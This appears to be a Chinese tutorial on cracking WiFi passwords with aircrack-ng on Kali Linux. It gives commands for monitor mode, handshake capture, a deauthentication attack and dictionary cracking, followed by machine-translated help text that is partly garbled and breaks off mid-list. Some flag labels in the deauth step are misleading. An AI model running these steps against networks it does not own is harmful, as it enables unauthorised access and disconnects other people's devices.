kali2022.2无线网络WiFi破解详解

前言

无线网络WiFi破解，利用自己家庭无线网络作为实验环境，请勿用于非法用途。

一、无线网络WiFi破解模块？

airmon-ng #网卡模式切换
airodump-ng #网络监听模式（抓取无线网络数据包）
aireplay-ng #网络设备攻击
aircrack-ng #破解无线密码

二、使用步骤详解

airmon-ng start wlan0 #开启无线网卡监听模式
airodump-ng wlan0mon #扫描型号区域内WiFi信号
airodump-ng -c 6 --bssid 无线网络mac地址 -w 抓取文件保存路径 wlan0mon #抓取目标无线网络数据包
aireplay-ng -0 0 -a 本地无线网络mac地址 -c 目标无线网络mac地址 wlan0mon #断网攻击目标无线网络设备
airmon-ng stop wlan0mon #关闭无线网卡监听模式
aircrack-ng -w 密码字典文件 抓包文件（.cap文件） #从密码字典文件破解抓取目标无线网络数据包

aircrack-ng命令用法

aircrack-ng
usage: aircrack-ng [options] <input file(s)>
用法：aircrack ng[选项]<输入文件>
Common options:
常见选项：
-a : force attack mode (1/WEP, 2/WPA-PSK)
-a:force攻击模式（1/WEP，2/WPA-PSK）
-e : target selection: network identifier
-目标选择：网络标识符
-b : target selection: access point’s MAC
-目标选择：接入点的MAC
-p : # of CPU to use (default: all CPUs)
-要使用的CPU的#（默认值：所有CPU）
-q : enable quiet mode (no status output)
-q：启用安静模式（无状态输出）
-C : merge the given APs to a virtual one
-C:将给定AP合并到虚拟AP
-l : write key to file. Overwrites file.
-l：将密钥写入文件。覆盖文件。
Static WEP cracking options:
静态WEP开裂选项：
-c : search alpha-numeric characters only
-c：仅搜索字母数字字符
-t : search binary coded decimal chr only
-t：仅搜索二进制编码的十进制chr
-h : search the numeric key for Fritz!BOX
-h：在数字键中搜索Fritz！盒子
-d : use masking of the key (A1:XX:CF:YY)
-d：使用键的掩码（A1:XX:CF:YY）
-m : MAC address to filter usable packets
-m:MAC地址，用于过滤可用数据包
-n : WEP key length : 64/128/152/256/512
-n:WEP密钥长度：64/128/152/256/512
-i : WEP key index (1 to 4), default: any
-i：WEP键索引（1到4），默认值：任意
-f : bruteforce fudge factor, default: 2
-f:bruteforce-fudge因子，默认值：2
-k : disable one attack method (1 to 17)
-k：禁用一种攻击方法（1到17）
-x or -x0 : disable bruteforce for last keybytes
-x或-x0：对最后一个密钥字节禁用暴力
-x1 : last keybyte bruteforcing (default)
-x1:last keybyte bruteforcing（默认）
-x2 : enable last 2 keybytes bruteforcing
-x2：启用最后2个密钥字节暴力破解
-y : experimental single bruteforce mode
-y：实验单蛮力模式
-K : use only old KoreK attacks (pre-PTW)
-K：仅使用旧KoreK攻击（PTW之前）
-s : show